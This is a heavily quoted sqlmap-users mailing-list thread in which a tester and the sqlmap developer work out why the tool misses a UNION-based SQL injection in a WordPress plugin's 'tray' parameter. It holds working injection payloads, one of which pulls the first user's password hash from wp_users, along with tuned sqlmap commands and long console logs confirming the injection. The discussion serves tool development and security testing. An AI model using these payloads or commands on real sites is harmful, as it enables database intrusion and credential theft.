> number) - 1 to 10 columns' injectable
> POST parameter 'tray' is vulnerable. Do you want to keep testing the
> others (if any)? [y/N] n
> sqlmap identified the following injection points with a total of 26
> HTTP(s) requests:
> ---
> Parameter: tray (POST)
> Type: UNION query
> Title: MySQL UNION query (random number) - 1 column
> Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT
> CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
> ---
> [09:55:02] [INFO] testing MySQL
> [09:55:02] [INFO] confirming MySQL
> [09:55:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Apache 2.4.7, PHP 5.5.9
> back-end DBMS: MySQL >= 5.0.0
> [09:55:03] [INFO] fetched data logged to text files under
> '/home/bperry/.sqlmap/output/172.31.16.26'
>
> [*] shutting down at 09:55:03
>
> bperry@ubuntu:~/tools/sqlmap$
>
>
> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...
> > wrote:
>>
>> Sorry, one more thing to note, the following command gets very close to
>> exploiting the injection:
>>
>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
>> /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
>> LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>
>> The only problem is that the union-char is 'f', when I was hoping it
>> would be 0x66. When I capture the request and replace 'f' with 0x66, the
>> injection works. Looks like ' is a bad char.
>>
>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <
>> bpe...@gm...> wrote:
>>>
>>> Playing with the queries sqlmap sends a bit more:
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>
>>> This results in a 0 being returned where the password hash was in the
>>> successful injection:
>>>
>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>> ^ injection result
>>>
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>
>>> This payload also results in a 0 being returned, not 'fdsa' as you would
>>> expect.
>>>
>>> However, this payload does return 'fdsa'
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>> 1,1#&mid=1
>>>
>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>> 1,1#[split]
>>>
>>>
>>> Hope this helps.
>>>
>>>
>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>>
>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>>>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>> _
>>>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>>>> |_ -| . | | | .'| . |
>>>> |___|_ |_|_|_|_|__,| _|
>>>> |_| |_| http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by this
>>>> program
>>>>
>>>> [*] starting at 08:56:27
>>>>
>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>> [08:56:27] [INFO] flushing session file
>>>> [08:56:27] [INFO] testing connection to the target URL
>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>>>> couple of seconds
>>>> [08:56:28] [INFO] target URL is stable
>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>>>> 'tray' might not be injectable
>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>> clause'
>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>> clause (MySQL comment)'
>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>> clause (Generic comment)'
>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>> clause'
>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>> clause (MySQL comment)'
>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>> clause (Generic comment)'
>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>>>> ORDER BY or GROUP BY clause (RLIKE)'
>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>>>> replace (original value)'
>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>> replace (MAKE_SET - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>> replace (ELT - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>> replace (bool*int - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
>>>> replace (original value)'
>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>>>> replace (original value)'
>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>> ORDER BY clauses'
>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>> ORDER BY clauses (original value)'
>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>>>> and ORDER BY clauses'
>>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY
>>>> and ORDER BY clauses'
>>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>>>> HAVING clause'
>>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>> HAVING clause (EXTRACTVALUE)'
>>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>> HAVING clause (UPDATEXML)'
>>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or
>>>> HAVING clause (BIGINT UNSIGNED)'
>>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>>>> HAVING clause'
>>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or
>>>> HAVING clause'
>>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>> HAVING clause (EXTRACTVALUE)'
>>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>> HAVING clause (UPDATEXML)'
>>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or
>>>> HAVING clause (BIGINT UNSIGNED)'
>>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or
>>>> HAVING clause'
>>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING
>>>> clause'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>>> (EXTRACTVALUE)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>>> (UPDATEXML)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
>>>> (BIGINT UNSIGNED)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and
>>>> ORDER BY clauses'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>> ORDER BY clauses (EXTRACTVALUE)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>> ORDER BY clauses (UPDATEXML)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and
>>>> ORDER BY clauses (BIGINT UNSIGNED)'
>>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind
>>>> (comment)'
>>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>>>> query)'
>>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
>>>> time-based blind (heavy query)' injectable
>>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>>> [08:58:26] [INFO] automatically extending ranges for UNION query
>>>> injection technique tests as there is at least one other (potential)
>>>> technique found
>>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1
>>>> columns
>>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>>>> columns'
>>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
>>>> columns'
>>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
>>>> columns'
>>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
>>>> columns'
>>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to
>>>> 100 columns'
>>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to
>>>> 20 columns'
>>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40
>>>> columns'
>>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to
>>>> 40 columns'
>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60
>>>> columns'
>>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to
>>>> 60 columns'
>>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80
>>>> columns'
>>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to
>>>> 80 columns'
>>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100
>>>> columns'
>>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>>>> 100 columns'
>>>> [08:58:54] [INFO] checking if the injection point on POST parameter
>>>> 'tray' is a false positive
>>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>>>> others (if any)? [y/N] n
>>>> sqlmap identified the following injection points with a total of 2049
>>>> HTTP(s) requests:
>>>> ---
>>>> Parameter: tray (POST)
>>>> Type: AND/OR time-based blind
>>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>>> Payload: action=getMailMessage&tray=in_deleted AND
>>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>>> ---
>>>> [08:59:48] [INFO] testing MySQL
>>>> [08:59:48] [WARNING] it is very important not to stress the network
>>>> adapter during usage of time-based payloads to prevent potential errors
>>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses
>>>> (option '--time-sec')? [Y/n]
>>>> [08:59:51] [INFO] confirming MySQL
>>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
>>>> times
>>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>>> web server operating system: Linux Ubuntu
>>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>>> back-end DBMS: MySQL >= 5.0.0
>>>> [08:59:53] [INFO] fetched data logged to text files under
>>>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>>>
>>>> [*] shutting down at 08:59:53
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>
>>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>>>> mir...@gm...> wrote:
>>>>>
>>>>> Hi.
>>>>>
>>>>> I don't see a reason why this form of UNION test would be any
>>>>> different than the regular used by sqlmap. Can you please send me the
>>>>> traffic file for such run (... --flush-session -t traffic.txt) along with
>>>>> console output?
>>>>>
>>>>> Bye
>>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>>>>> wrote:
>>>>>
>>>>>> Hello!
>>>>>>
>>>>>> Playing around with the following vulnerabivlity:
>>>>>>
>>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>>
>>>>>>
>>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>>>> does result in a response from the server with the hash of the first user:
>>>>>>
>>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>>
>>>>>>
>>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>>>
>>>>>> Just a thought!
>>>>>>
>>>>>>
>>>>>> --
>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>> http://www.volatileminds.net -- website
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>>>> from Actuate! Instantly Supercharge Your Business Reports and
>>>>>> Dashboards
>>>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>>>> more
>>>>>> Get technology previously reserved for billion-dollar corporations,
>>>>>> FREE
>>>>>>
>>>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:55:36
|
Aha, I got it:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
-p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080
--technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5
--risk=3 -o _
___ ___| |_____ ___ ___ {1.0-dev-180ede0}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 09:54:50
[09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
[09:54:50] [INFO] setting file for logging HTTP traffic
[09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
disabled because of its incompatibility with HTTP(s) proxy
[09:54:50] [INFO] testing connection to the target URL
[09:54:50] [INFO] heuristics detected web page charset 'ascii'
[09:54:50] [WARNING] heuristic (basic) test shows that POST parameter
'tray' might not be injectable
[09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
[09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:54:51] [WARNING] reflective value(s) found and filtering out
[09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10
columns'
[09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
[09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random
number) - 1 to 10 columns' injectable
POST parameter 'tray' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 26 HTTP(s)
requests:
---
Parameter: tray (POST)
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT
CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
---
[09:55:02] [INFO] testing MySQL
[09:55:02] [INFO] confirming MySQL
[09:55:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:55:03] [INFO] fetched data logged to text files under
'/home/bperry/.sqlmap/output/172.31.16.26'
[*] shutting down at 09:55:03
bperry@ubuntu:~/tools/sqlmap$
On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...>
wrote:
>
> Sorry, one more thing to note, the following command gets very close to
> exploiting the injection:
>
> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
> /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
> LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>
> The only problem is that the union-char is 'f', when I was hoping it would
> be 0x66. When I capture the request and replace 'f' with 0x66, the
> injection works. Looks like ' is a bad char.
>
> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...
> > wrote:
>>
>> Playing with the queries sqlmap sends a bit more:
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>
>> This results in a 0 being returned where the password hash was in the
>> successful injection:
>>
>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>> ^ injection result
>>
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>
>> This payload also results in a 0 being returned, not 'fdsa' as you would
>> expect.
>>
>> However, this payload does return 'fdsa'
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
>> 1,1#&mid=1
>>
>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT
>> 1,1#[split]
>>
>>
>> Hope this helps.
>>
>>
>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <
>> bpe...@gm...> wrote:
>>>
>>> Here is the console output. Attached is the traffic log in a zip:
>>>
>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>> _
>>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>>> |_ -| . | | | .'| . |
>>> |___|_ |_|_|_|_|__,| _|
>>> |_| |_| http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by this
>>> program
>>>
>>> [*] starting at 08:56:27
>>>
>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>> [08:56:27] [INFO] flushing session file
>>> [08:56:27] [INFO] testing connection to the target URL
>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>>> couple of seconds
>>> [08:56:28] [INFO] target URL is stable
>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>>> 'tray' might not be injectable
>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause'
>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause (MySQL comment)'
>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause (Generic comment)'
>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause'
>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause (MySQL comment)'
>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause (Generic comment)'
>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>>> ORDER BY or GROUP BY clause (RLIKE)'
>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (MAKE_SET - original value)'
>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (ELT - original value)'
>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (bool*int - original value)'
>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>> ORDER BY clauses'
>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>> ORDER BY clauses (original value)'
>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>>> and ORDER BY clauses'
>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY
>>> and ORDER BY clauses'
>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>>> HAVING clause'
>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>> HAVING clause (EXTRACTVALUE)'
>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>> HAVING clause (UPDATEXML)'
>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or
>>> HAVING clause (BIGINT UNSIGNED)'
>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>>> HAVING clause'
>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
>>> clause'
>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>>> clause (EXTRACTVALUE)'
>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>>> clause (UPDATEXML)'
>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
>>> clause (BIGINT UNSIGNED)'
>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
>>> clause'
>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>> (EXTRACTVALUE)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>> (UPDATEXML)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
>>> (BIGINT UNSIGNED)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER
>>> BY clauses'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>>> BY clauses (EXTRACTVALUE)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>>> BY clauses (UPDATEXML)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER
>>> BY clauses (BIGINT UNSIGNED)'
>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>>> query)'
>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
>>> time-based blind (heavy query)' injectable
>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>> [08:58:26] [INFO] automatically extending ranges for UNION query
>>> injection technique tests as there is at least one other (potential)
>>> technique found
>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1
>>> columns
>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>>> columns'
>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
>>> columns'
>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
>>> columns'
>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
>>> columns'
>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
>>> columns'
>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
>>> columns'
>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to
>>> 40 columns'
>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to
>>> 60 columns'
>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to
>>> 80 columns'
>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100
>>> columns'
>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>>> 100 columns'
>>> [08:58:54] [INFO] checking if the injection point on POST parameter
>>> 'tray' is a false positive
>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>>> others (if any)? [y/N] n
>>> sqlmap identified the following injection points with a total of 2049
>>> HTTP(s) requests:
>>> ---
>>> Parameter: tray (POST)
>>> Type: AND/OR time-based blind
>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>> Payload: action=getMailMessage&tray=in_deleted AND
>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>> ---
>>> [08:59:48] [INFO] testing MySQL
>>> [08:59:48] [WARNING] it is very important not to stress the network
>>> adapter during usage of time-based payloads to prevent potential errors
>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses
>>> (option '--time-sec')? [Y/n]
>>> [08:59:51] [INFO] confirming MySQL
>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
>>> times
>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>> web server operating system: Linux Ubuntu
>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>> back-end DBMS: MySQL >= 5.0.0
>>> [08:59:53] [INFO] fetched data logged to text files under
>>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>>
>>> [*] shutting down at 08:59:53
>>>
>>> bperry@ubuntu:~/tools/sqlmap$
>>>
>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>>> mir...@gm...> wrote:
>>>>
>>>> Hi.
>>>>
>>>> I don't see a reason why this form of UNION test would be any different
>>>> than the regular used by sqlmap. Can you please send me the traffic file
>>>> for such run (... --flush-session -t traffic.txt) along with console
>>>> output?
>>>>
>>>> Bye
>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>>>> wrote:
>>>>
>>>>> Hello!
>>>>>
>>>>> Playing around with the following vulnerabivlity:
>>>>>
>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>
>>>>>
>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>>> does result in a response from the server with the hash of the first user:
>>>>>
>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>
>>>>>
>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>>
>>>>> Just a thought!
>>>>>
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
